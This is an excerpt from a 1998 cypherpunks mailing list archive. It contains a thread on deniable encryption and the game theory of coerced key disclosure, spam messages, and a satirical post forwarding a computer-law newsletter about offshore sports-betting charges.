Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof, or abridging the freedom of speech 
or of the press; or the right of the people peaceably to assemble, and to petition the Government for a redress of grievances.         
    
Amendment I, The US Constitution                                                                :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mihai Tarabuta" <bastus7@hotmail.com>
Date: Sat, 28 Mar 1998 05:15:42 -0800 (PST)
To: cypherpunks-unedited@toad.com
Subject: sec file
Message-ID: <19980328131510.10572.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi folks,
I'm a newbie so I my be in a wrong place,.
Anyway, can someone tell me what kind of program(MSDOS/WINDOWS) encrypts 
file(s) and as a result, it makes a file with ".sec" extension. The 
result file contains a header string "PNCICRYPT".
Thanks.


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 18240_es@GHNVIX.com
Date: Sat, 28 Mar 1998 10:53:56 -0800 (PST)
To: Products@mail.mymail.net
Subject: Vitamins & Beauty Products Wholesale or Retail
Message-ID: <199803281924.NAA05797@mail.mymail.net>
MIME-Version: 1.0
Content-Type: text/plain


============================================================
For all your internet marketing go to http://www.submit200.com 
Submit200 For All Your Marketing Needs. 
============================================================
We are a  private legal corporation promoting our products to the internet community. If you have received this e-mail in error, kindly e-mail us at the address below and we will remove your name from our list.
We sell vitamins and beauty products, wholesale and retail. To receive a list of the products available, along with a price list e-mail us at the address below for information.

earle@singenterprise.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@iq.org>
Date: Fri, 27 Mar 1998 22:59:10 -0800 (PST)
To: mgraffam@mhv.net
Subject: Deniable Cryptography [was winnowing, chaffing etc]
In-Reply-To: <Pine.LNX.3.96.980327182424.15973A-100000@localhost>
Message-ID: <wxu38jfgiy.fsf@polysynaptic.iq.org>
MIME-Version: 1.0
Content-Type: text/plain


mgraffam@mhv.net writes:

> I figure the best we can do is to hide the contents of S with crypto and
> hide its existence through other means. Traditional stego works well 
> for this latter goal, but it does not give us a way to cough up something
> meaningful in place of S, which could be very handy.
> 
> In short, certainly the existence of S needs to be hidden, and it would be
> best to do hide it in plain sight as it were, in a big junk pile with
> everything else on the drive. 
> 
> Indexing this huge mess of data to allow for a practical system to work
> with is certainly a challenge, and in all likelyhood impossible given the
> parameters of the system.
> 

Marutukku (my rubber-hose proof filing system) addresses most of these
technical issues, but I'd like to just comment on the best strategy
game-theory wise, of the person wielding the rubber-hose.

In Marutukku the number of encrypted extents (deniable "virtual"
partitions) defaults to 16 (although is theoretically unlimited). As
soon as you get over about 4 pass-phrases, the excuse "I can't recall"
or "there's nothing else there" starts to sounding highly plauseable.

Ordinarily best strategy for the rubber-hose wielder is to keep on
beating keys out of (let us say, Alice) indefinitely till there are no
keys left. However, and importantly, in Marutukku, *Alice* can never
prove that she has handed over the last key. As Alice hands over more
and more keys, her attackers can make observations like "the keys
Alice has divulged correspond to 85% of the bits". However at no point
can her attackers prove that the remaining 15% isn't simply
unallocated space, and at no point can Alice, even if she wants to,
divulge keys to 100% of the bits, in order to get the un-divulged
portion down to 0%. An obvious point to make here is that
fraction-of-total-data divulged is essentially meaningless, and both
parties know it - the launch code extent may only take up .01% of the
total bit-space.

What I find interesting, is how this constraint on Alice's behaviour
actually protects her from revealing her own keys, because each party,
at the outset can make the following observations:

Rubber-hose-squad: We will never be able to show that Alice has
		   revealed the last of her keys. Further, even if
		   Alice has co-operated fully and has revealed all of
		   her keys, she will not be able to prove it.
		   Therefor, we must assume that at every stage that
		   Alice has kept secret information from us, and
		   continue to beat her, even though she may have
		   revealed the last of her keys. But the whole time
		   we will feel uneasy about this because Alice may
		   have co-operated fully. Alice will have realised this
		   though, and so presumably it's going to be very hard
		   to get keys out of her at all.


Alice:		   (Having realised the above) I can never prove that I
		   have revealed the last of my keys. In the end I'm
		   bound for continued beating, even if I can buy
		   brief respites by coughing up keys from time to
		   time. Therefor, it would be foolish to divulge my
		   most sensitive keys, because (a) I'll be that much
		   closer to the stage where I have nothing left to
		   divulge at all (it's interesting to note that this
		   seemingly illogical, yet entirely valid argument of
		   Alice's can protect the most sensitive of Alice's
		   keys the "whole way though", like a form
		   mathematical induction), and (b) the taste of truly
		   secret information will only serve to make my
		   aggressors come to the view that there is even
		   higher quality information yet to come, re-doubling
		   their beating efforts to get at it, even if I have
		   revealed all. Therefor, my best strategy would be
		   to (a) reveal no keys at all or (b) depending on
		   the nature of the aggressors, and the psychology of
		   the situation, very slowly reveal my "duress" and
		   other low-sensitivity keys.

Alice certainly isn't in for a very nice time of it (although she
she's far more likely to protect her data).

On the individual level, you would have to question whether you might
want to be able to prove that, yes, infact you really have surrendered
the last remaining key, at the cost of a far greater likelihood that
you will. It really depends on the nature of your opponents.  Are they
intelligent enough understand the deniable spect of the cryptosystem
and come up with the above strategy? Determined to the extent they
are will to invest the time and effort in wresting the last key out of
you? Ruthless - do they say "Please", hand you a Court Order, or is it
more of a Room 101 affair?

But there's more to the story.

Organisations and groups may have quite different goals in terms of
key retention vs torture relief to the individuals that comprise them,
even if their views are otherwise co-aligned. I'm not talking about
some mega-complex multinational 8 level hierarchy. A simple democratic
union of two or more people will exhibit this behaviour.

When a member of a group, who uses conventional cryptography to
protect group secrets is rubber-hosed, they have two choices (1)
defecting (by divulging keys) in order to save themselves, at the cost
of selling the other individuals in the group down the river or (2)
staying loyal, protecting the group and in the process subjugating
themselves continued torture.

With Marutukku-style deniable cryptography, the benefits to the
individual derived from choosing tactic (1) are largely
eliminated. Individuals that are "otherwise loyal" to the group, will
realise this and choose tactic (2).

Presumably most people in the group do not want to be forced to give
up their ability to choose defection. On the other hand, no one in the
group wants anyone (other than themselves) in the group to be given
the option of defecting against the group (and thus
themselves). Provided no individual is certain* they are to be
rubber-hosed, every individual will support the adoption of a
group-wide Marutukku-style cryptographically deniable crypto-system.

* Actually a complicated threshold.

Cheers,
Julian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Sat, 28 Mar 1998 15:05:15 -0800 (PST)
To: Julian Assange <proff@iq.org>
Subject: Re: Deniable Cryptography [was winnowing, chaffing etc]
In-Reply-To: <wxu38jfgiy.fsf@polysynaptic.iq.org>
Message-ID: <Pine.LNX.3.96.980328173343.23115B-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 28 Mar 1998, Julian Assange wrote:
> Rubber-hose-squad: We will never be able to show that Alice has
> 		   revealed the last of her keys. Further, even if
> 		   Alice has co-operated fully and has revealed all of
> 		   her keys, she will not be able to prove it.
> 		   Therefor, we must assume that at every stage that
> 		   Alice has kept secret information from us, and
> 		   continue to beat her, even though she may have
> 		   revealed the last of her keys. But the whole time
> 		   we will feel uneasy about this because Alice may
> 		   have co-operated fully.

I've never really fully understood this assumption. It seems to me
that any person or group that would beat a person isn't going to
care much if Alice cooperated or not. 

All things considered, a group with enough power to grab Alice and
beat her probably has ways to escape punishment from the law, or
doesn't care about the law in the first place. 

In this case, I figure that their best option is to beat Alice everyday
forever or until she dies. Whichever comes first.

The longer they beat her, the better chance there is that she broke
down and gave them her most important secrets. Even if she can't prove
it.. so what? The rubber-hose group isn't exactly the boy scouts. They
beat her the next day too, this time a little harder.

Alice may hold up, she may not.. I don't really see the cryptosystem
helping here. You can't win a game when the other player doesn't use
your rules. You have to use the same set of rules. We know that
the rubber-hose wielding guys aren't going to play by Alice's rules.
So, the only way for Alice to win is to do the impossible (because this
is reality, not TV) and that is to grab the rubber hose and beat them
with it.

I don't think that any crypto can defend this sort of attack, because
it has nothing to do with crypto. Consider even a one-time pad. Alice
could calculate the needed pads that would turn her ciphertext into
other meaningful plaintext messages. So they beat her. She gives them
a pad.. and they beat her again. It won't end. They can never know
if they got the "right" pad. But it doesn't really matter, does it?

In my opinion deniable encryption is only valuable against a more or
less civil entity. 

Now, what might be useful is some sort of biometric info that is part
of the key material. Heart rate, brain wave patterns, maybe biochemical
information. As Alice gets beat the fluctuations in her body could make
it impossible for her to reveal the information. A sensitive enough
system might even stand up against stuff like intimidation and
nervousness.. a polygraph test can supposedly detect this.

If such a system were implemented, then this could render rubber-hose
cryptanalysis useless, or at least much harder to put into effect.

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
Let your life be a counter-friction to stop the machine.
				Henry David Thoreau "Civil Disobedience"


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBNR1/dgKEiLNUxnAfAQF5vwP+Mfykp2hNTgItZpgq5GXPoPwQl0enJv40
C+q43NSvaOzO3t+DAjfJj2IJuqDKXRy5FZikkCvOvr1cadJMbhqliKIrOHC1fkeB
ElDnx+7LxzlGsgieAxGFI8JvEB685VY8qsprYFzfI2hQitvztPccpQE/Xvr0ftZi
3meDBzVLq8A=
=0bdE
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Sat, 28 Mar 1998 15:30:29 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Re: Deniable Cryptography [was winnowing, chaffing etc]
Message-ID: <199803282330.SAA11522@mx02.together.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 3/28/98 5:53 PM, mgraffam@mhv.net (mgraffam@mhv.net)  passed this
wisdom:

>In this case, I figure that their best option is to beat Alice 
>everyday forever or until she dies. Whichever comes first.
>
>The longer they beat her, the better chance there is that she broke 
>down and gave them her most important secrets. Even if she can't 
>prove it.. so what? The rubber-hose group isn't exactly the boy 
>scouts. They beat her the next day too, this time a little harder.
>
>Alice may hold up, she may not.. I don't really see the 
>cryptosystem helping here. You can't win a game when the other 
>player doesn't use your rules. You have to use the same set of 
>rules. We know that the rubber-hose wielding guys aren't going to 
>play by Alice's rules. So, the only way for Alice to win is to do 
>the impossible (because this is reality, not TV) and that is to 
>grab the rubber hose and beat them with it. 

 The whole point is that since such a system offers no way to verify
that Alice has indeed at any point given them 'everything' she has to
tell, they will keep beating Alice; Alice, recognizing this at the
outset has no reason to give them anything because she knows that since
she cannot prove she has given them everything they will beat her again
and again no matter what she does. The idea of successive keys unlocking
more and more important data means that she can chose to give them some
of her keys and then just grit out the beatings til they either develop
conscience (unlikely), lose patience, (more likely), or figure they have
gotten all there is to get.

While this method guarantees a beating, it really does offer the best
chance of getting away with the withholding of the most secure keys.

The only chink in the system would be independent knowledge from a
coworker or some such that there is more there.
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNR2H/z7r4fUXwraZAQFbUgf/V97xgxpNs0wIcvUvoUK0p4gShYrzqDRm
qXMz6rVTwMKNhBF/0Jdsfu8PMq7M6ZoU051I5FqYEgI2uaqUMxoPx9qjrGOJnOv3
pXr5usa4rRVv5k7mQOJjd1zXXbcJNo6QWWk35zbLS5ecXQgN98Ex2DgApxACzKin
6+rpaTPFzOaktIzSVvM0on2TcC7ifkhkzDjsqIYx3b3gp73p+kzlWgkxngSM2rXZ
Od2eEQDSJDnQc4n5DU7xxmwQ5qxz5GCcQiONHkL4pXSHvkbvGkNkPS8Ms/hsF2nJ
SiSlmoYQBem3YB/Ik1UEFrqOhRispsYU9NAgii7EtqyAReEnYMI1gQ==
=0JND
-----END PGP SIGNATURE-----


Brian B. Riley --> http://members.macconnect.com/~brianbr
  For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

  "Do not go where the path may lead, go instead where there is
    no path, and leave a trail"  - Ralph Waldo Emerson






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Toto" <toto@sk.sympatico.ca>
Date: Sat, 28 Mar 1998 16:45:46 -0800 (PST)
To: "CypherPunks" <cypherpunks@toad.com>
Subject: CypherPunks -- The Early Years Part II
Message-ID: <000101bd5abc$848b11e0$2763a58e@uymfdlvk>
MIME-Version: 1.0
Content-Type: text/plain


Eric Hughes, secretly writing Prologue 15/0 of SPACE ALIENS HIDE MY
DRUGS,
   quoted L.M. Boyd as saying:

 Among black bears, a mother rules a territory. When her
daughter is a year and a half old, the mother assigns a
portion of the territory to said daughter. This doesn't
happen to the black bear son. When he's about three years
old, he's just flatout driven off the property. Look,
there's one down at the end of the bar, saying, "My mommy
kicked me out when I was three."

~~~~
A Toto To Be Or Not To Be Named Earlier <toto@sk.sympatico.ca>
(aka - F. Bacon)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sexysusie18@mailexcite.com
Date: Sat, 28 Mar 1998 18:45:09 -0800 (PST)
To: sexysusie18@mailexcite.com
Subject: MORE FREE PIX AND FREE MEMBERSHIP
Message-ID: <199803290254.SAA24584@zona.hayarkon.com>
MIME-Version: 1.0
Content-Type: text/plain


Hot college girls behind closed doors

FREE to see FREE to do FREE

http://www.universitybabes.com

Whatever you want to see 'em do, they do
right on your screen.  College is better now
than ever before.

A hundred thousand pix.
Thumbnails.
2500 HOT Videos.
Movies.
Stories.
Hardcore.

FREE MEMBERSHIP

http://www.universitybabes.com

There are even over 2500 hardcore videos
that you can check out free.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Sat, 28 Mar 1998 17:21:17 -0800 (PST)
To: "Brian B. Riley" <brianbr@together.net>
Subject: Re: Deniable Cryptography [was winnowing, chaffing etc]
In-Reply-To: <199803282330.SAA11522@mx02.together.net>
Message-ID: <Pine.LNX.3.96.980328194029.23946A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 28 Mar 1998, Brian B. Riley wrote:
>  The whole point is that since such a system offers no way to verify
> that Alice has indeed at any point given them 'everything' she has to
> tell, they will keep beating Alice; Alice, recognizing this at the
> outset has no reason to give them anything because she knows that since
> she cannot prove she has given them everything they will beat her again
> and again no matter what she does.

She has a reason to tell them as much as she can. When she tells them a
key that yields meaningful data, they stop beating her for the day.
At some point she will give away all the keys that yield innocuous or
less important data. Then she will say "I dont have anything else."
Which the bad guys figure she is going to say at some point anyhow, and
they keep beating her no matter what, as we agree they will probably do.

At some point, she will give up that most important key just to escape
the day's beating, or to get the knife removed from her hand.. If the
attackers are smart, they would leave her alone for varying amounts of
time, so that at any point the key that she gives might buy her a month
or more of pain-free existence. Maybe more.

If I were a bad guy, I'd opt for letting her live well for a few years,
and then one day we start the beatings again, as often as possible (short
of killing her). At some point, she'll say "The only key that I have left
is the most important one. If I give it up, maybe I'll get another 2 years
of the good life."

She would know that I would never let her go, and she would know that
the beatings would continue for the rest of her life. It simply becomes
a matter of how much pain-free time she gives herself. 

If the attacker beat her every second of every day, no matter if she
gives a key or not, then you are right. I suspect everyone would keep
their mouth shut out of spite, if nothing else. 

But if the key she gives yields meaningful data, then the tables
change really quickly.

There is another point to realize, there is a point where you simply
stop acting reasonably because of the pain and suffering.. and once
reason is out the window, expecting Alice to hold on to the keys because
she is screwed either way is a gamble. Sure, the scheme works when we
are being reasonable, but when you get the side of your head smashed
it, reasonableness is one of the first things to leave you.

This is why I think that pursuing a biological form of authentication
could be so useful. It could potentially make beating the person 
prolong the time needed to get the information. If the bioauthentication
system could take biofeedback from feelings like intimidation or anxiety,
and use these to alter the resulting "key" output, then it would actually
behoove the attackers to give Alice a nice comfy bed and 3 squares a day.

	"Sometimes," she said, "they threaten you with something --
	something that you can't stand up to, can't even think about."
	...
	"Under the spreading chestnut tree
	I sold you and you sold me -"
						- Julia, and a portion of
						  a song from "1984"

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
Let your life be a counter-friction to stop the machine.
				Henry David Thoreau "Civil Disobedience"

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBNR2gXAKEiLNUxnAfAQEpLwP9HUO8wGOGp6u7iSLcvzbB71m2BGgK1z7r
5ODfaIO4dLMwvUG8MPV6JedYDODVL+l6Ea7U8pKR/oO6fTV9Y2UhW8jSJunbgQ83
mIEAaZPCVpJxUELVBfpuQAkGIITOGiGjrmozlojH+l8x/AW0t3xyFQG/wvRwxBSO
Z+EHWifLb38=
=pbuj
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Janet Reno <jr@dev.null>
Date: Sat, 28 Mar 1998 22:28:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Laws? We don't need no stinking laws!!!
Message-ID: <351E0477.5E1E@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


From: "Janet Reno" <jr@dev.null>
To: "CypherPunks" <cypherpunks@toad.com>
Bcc: <barry.nemmers@chadbourne.com>,
	<toto@sk.sympatico.ca>
Subject: Laws? We don't need no stinking laws...
Date: Sat, 28 Mar 1998 23:59:15 -0800
MIME-Version: 1.0
Content-Type: multipart/related;
	type="multipart/alternative";
	boundary="----=_NextPart_000_0072_01BD5AA5.83C87CA0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.2106.4
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4

This is a multi-part message in MIME format.

------=_NextPart_000_0072_01BD5AA5.83C87CA0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_001_0073_01BD5AA5.83C87CA0"


------=_NextPart_001_0073_01BD5AA5.83C87CA0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


Announcing
Those who still labor under the illusion that the Royal WE need the =
existence of real, constitutionally enforceable laws to arrest, charge =
and financially ruin (conviction or not) those who oppose US and our =
financial supporters may, if they wish, go ahead and submit to the =
inevitable by reporting immediately to the Reptilian Nazi labor camps =
recently finished at Lost Alamo, and in Mule Shoe, Texas.

                   ******************************
             =
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
                 INTERNATIONAL COMPUTER LAW OBSERVER
                      March, 1998 -- No.4
             =
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
                   ******************************

---UNITED STATES---

[BOTTOM LINE]   UNITED STATES CHARGES 6 OFFSHORE COMPANIES WITH ILLEGAL
OFFSHORE SPORTS BETTING

[WHAT HAPPENED]  On March 4, authorities led by the FBI charged 14 =
owners
and managers of 6 companies with illegal use of interstate telephone =
lines
for on-line betting on amateur and professional sports.  All 14 =
defendants
are American citizens.  The 6 companies are located in Central America =
and
the Caribbean; some have offices in the United States.  No bettors were
charged.  Three of the 14 were arrested in the United States and the FBI
was said to be contacting the 10 who were known to be outside the United
States to "arrange for their surrender."  Web sites of at least several =
of
the 6 claim that they are operating within their local national gaming
laws.  The FBI and U.S. Attorney in New York City targeted sports books =
and
not casino gaming sites.   The U.S. Attorney's office said it had called
various telephone companies telling them to stop service to each of the
companies.  The defendants could be sentenced to a maximum of 5 years in
prison and $250,000 in fines.

In the only other federal action against on-line betting, FBI agents =
raided
the Pennsylvania offices of International Gaming and Communications =
Corp.
in February 1997 but no federal charges were filed.  That company had
operated a sportsbook and on-line casino in Grenada.

[WHY IT HAPPENED]  It is speculated by some that pressure from
Congressional sponsors of legislation restricting and/or banning on-line
gambling was behind the charges.  The Department of Justice has said in =
the
past that the federal Wire Communications Act is not written well enough =
to
support its use against on-line betting.  While bills to rewrite the Act
are pending, some in Congress and among the public are impatient that no
federal enforcement actions have been taken.  Others speculate that =
state
governments are concerned that their lucrative take from lotteries and
other state-sponsored non-sports betting could be reduced if on-line
betting is not discouraged.

[THE SIGNIFICANCE]  If the charges are not settled and are pursued =
through
trial and appeals, this could be the case to write US law on a number of
fundamental on-line issues, including jurisdiction and national
sovereignty, as well as on-line gambling.  It is doubtful that anyone
expects law enforcement to eliminate on-line gambling; the intent may
simply be to discourage its rapid growth, particularly in sports =
betting.
The government clearly is testing the reach of existing law; even =
decisions
adverse to it would be useful by identifying shortcomings in existing =
law.

[INFORMATION SOURCES]  For the news story:  www.nytimes.com and
www.cnn.com.
The six companies can be found at:
www.galaxysports.com (Galaxy Sports)
www.islandcasino.com (Island Casino)
www.realcasino.com (Real Casino)
www.sdbg.com (SDB Global)
www.winnersway.com (Winner's Way)
www.wsex.com (World Sports Exchange)

[CONTRIBUTING EDITOR]  Chadbourne & Parke - Contact Barry Nemmers:
barry.nemmers@chadbourne.com




------=_NextPart_001_0073_01BD5AA5.83C87CA0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD W3 HTML//EN">
<HTML>
<HEAD>

<META content=3Dtext/html;charset=3Diso-8859-1 =
http-equiv=3DContent-Type><BASE=20
href=3D"file://C:\Program Files\Common Files\Microsoft =
Shared\Stationery\">
<STYLE>
<!--
body, UL, OL, DIR, MENU, DIV, DT, DD, ADDRESS, BLOCKQUOTE, PRE, BR, P, =
LI
{
color: black;
font-size: 20pt;
font-weight: regular;
font-family: "Perpetua MT", "Times New Roman";=20
}
h1
{
color:660000;
font-size:65pt;
font-weight: regular;
font-family: "Old English Text MT", "Times New Roman";=20
}
h2
{
color: 660000;
font-size: 24pt;
font-weight: regular;
font-family: "Old English Text MT", "Times New Roman";
}
-->
</STYLE>

<META content=3D'"MSHTML 4.72.2106.6"' name=3DGENERATOR>
</HEAD>
<BODY background=3Dcid:006a01bd5ae8$90b47520$2763a58e@uymfdlvk =
bgColor=3Dbeige=20
topMargin=3D150>
<DIV>&nbsp;</DIV>
<CENTER>
<H1>Announcing</H1></CENTER>
<P align=3Dcenter>Those who still labor under the illusion that the =
Royal WE need=20
the existence of real, constitutionally enforceable laws to arrest, =
charge and=20
financially ruin (conviction or not) those who oppose US and our =
financial=20
supporters may, if they wish, go ahead and submit to the inevitable by =
reporting=20
immediately to the Reptilian Nazi labor camps recently finished at Lost =
Alamo,=20
and in Mule Shoe, Texas.</P>
<P>&nbsp;&nbsp;&nbsp;<FONT=20
size=3D4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;=20
******************************<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<BR>&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;=20
INTERNATIONAL COMPUTER LAW=20
OBSERVER<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
March, 1998 --=20
No.4<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;=20
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<BR>&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;=20
******************************</FONT></P>
<P><FONT size=3D4>---UNITED STATES---</FONT></P>
<P><FONT size=3D4>[BOTTOM LINE]&nbsp;&nbsp; UNITED STATES CHARGES 6 =
OFFSHORE=20
COMPANIES WITH ILLEGAL<BR>OFFSHORE SPORTS BETTING</FONT></P>
<P><FONT size=3D4>[WHAT HAPPENED]&nbsp; On March 4, authorities led by =
the FBI=20
charged 14 owners<BR>and managers of 6 companies with illegal use of =
interstate=20
telephone lines<BR>for on-line betting on amateur and professional =
sports.&nbsp;=20
All 14 defendants<BR>are American citizens.&nbsp; The 6 companies are =
located in=20
Central America and<BR>the Caribbean; some have offices in the United=20
States.&nbsp; No bettors were<BR>charged.&nbsp; Three of the 14 were =
arrested in=20
the United States and the FBI<BR>was said to be contacting the 10 who =
were known=20
to be outside the United<BR>States to &quot;arrange for their=20
surrender.&quot;&nbsp; Web sites of at least several of<BR>the 6 claim =
that they=20
are operating within their local national gaming<BR>laws.&nbsp; The FBI =
and U.S.=20
Attorney in New York City targeted sports books and<BR>not casino gaming =

sites.&nbsp;&nbsp; The U.S. Attorney's office said it had =
called<BR>various=20
telephone companies telling them to stop service to each of=20
the<BR>companies.&nbsp; The defendants could be sentenced to a maximum =
of 5=20
years in<BR>prison and $250,000 in fines.</FONT></P>
<P><FONT size=3D4>In the only other federal action against on-line =
betting, FBI=20
agents raided<BR>the Pennsylvania offices of International Gaming and=20
Communications Corp.<BR>in February 1997 but no federal charges were=20
filed.&nbsp; That company had<BR>operated a sportsbook and on-line =
casino in=20
Grenada.</FONT></P>
<P><FONT size=3D4>[WHY IT HAPPENED]&nbsp; It is speculated by some that =
pressure=20
from<BR>Congressional sponsors of legislation restricting and/or banning =

on-line<BR>gambling was behind the charges.&nbsp; The Department of =
Justice has=20
said in the<BR>past that the federal Wire Communications Act is not =
written well=20
enough to<BR>support its use against on-line betting.&nbsp; While bills =
to=20
rewrite the Act<BR>are pending, some in Congress and among the public =
are=20
impatient that no<BR>federal enforcement actions have been taken.&nbsp; =
Others=20
speculate that state<BR>governments are concerned that their lucrative =
take from=20
lotteries and<BR>other state-sponsored non-sports betting could be =
reduced if=20
on-line<BR>betting is not discouraged.</FONT></P>
<P><FONT size=3D4>[THE SIGNIFICANCE]&nbsp; If the charges are not =
settled and are=20
pursued through<BR>trial and appeals, this could be the case to write US =
law on=20
a number of<BR>fundamental on-line issues, including jurisdiction and=20
national<BR>sovereignty, as well as on-line gambling.&nbsp; It is =
doubtful that=20
anyone<BR>expects law enforcement to eliminate on-line gambling; the =
intent=20
may<BR>simply be to discourage its rapid growth, particularly in sports=20
betting.<BR>The government clearly is testing the reach of existing law; =
even=20
decisions<BR>adverse to it would be useful by identifying shortcomings =
in=20
existing law.</FONT></P>
<P><FONT size=3D4>[INFORMATION SOURCES]&nbsp; For the news story:&nbsp; =
<A=20
href=3D"http://www.nytimes.com">www.nytimes.com</A> and<BR><A=20
href=3D"http://www.cnn.com">www.cnn.com</A>.<BR>The six companies can be =
found=20
at:<BR><A href=3D"http://www.galaxysports.com">www.galaxysports.com</A> =
(Galaxy=20
Sports)<BR><A =
href=3D"http://www.islandcasino.com">www.islandcasino.com</A>=20
(Island Casino)<BR><A =
href=3D"http://www.realcasino.com">www.realcasino.com</A>=20
(Real Casino)<BR><A href=3D"http://www.sdbg.com">www.sdbg.com</A> (SDB=20
Global)<BR><A href=3D"http://www.winnersway.com">www.winnersway.com</A> =
(Winner's=20
Way)<BR><A href=3D"http://www.wsex.com">www.wsex.com</A> (World Sports=20
Exchange)</FONT></P>
<P><FONT size=3D4>[CONTRIBUTING EDITOR]&nbsp; Chadbourne &amp; Parke - =
Contact=20
Barry Nemmers:<BR><A=20
href=3D"mailto:barry.nemmers@chadbourne.com">barry.nemmers@chadbourne.com=
</A></FONT></P>
<P>&nbsp;</P></BODY></HTML>

------=_NextPart_001_0073_01BD5AA5.83C87CA0--

------=_NextPart_000_0072_01BD5AA5.83C87CA0
Content-Type: image/gif
Content-Transfer-Encoding: base64
Content-ID: <006a01bd5ae8$90b47520$2763a58e@uymfdlvk>

R0lGODlh1wAgA7P/AP///2NjY8DAwJxjY5xjMf/OnM6cY///zpycY2NjMZycMWOcMWOcY2OcnGNj
nAAAACH5BAEAAAIALAAAAADXACADQAT/EBE1ZFCooVURI4MCLtPwVUYjSgNREhwhUXA7syKN4HI4
7SVeK7ab+UKKxksC7DB7q2JpBRLZlC0NRsYEFlkyLhDz3TUM3zNTrSmby+hiqngQHAr1g6EgKBgM
HC0JCQ8JIAk+EyAuW4YtFCIGCRwITgiIBIMJASSGk5oBgwQaIR2HLoKZmQ8Dnp+LGHt3BbS1tn5o
AwuimamEugMCAwMFCQIIAZIVCQaZzQSSO4iGsrXHmbyGNAqeLS4kmTSGO38CBnp4Bn09C4A2COpo
e+p8tZWZ8I5AMncHd2i7yrRStE3Gnw8TFFDQtqMRgz14aN3pQ0sSgQK7VCUMgQaDgj2X/y5ImySA
wIcAh+AhoPDnUi9IIhD5IOMRHpcHCO4kEAECjQsD3Aa1ylngErF+BU4FaHWu36VzYR4NCEALgZ+V
f1pmJRdrXMQDE4Ai8ofsARc/HxagrIDL1qyqFDKS4/C2VkYnexJYdStJrwGRFFqsnVDUk1oCoX4o
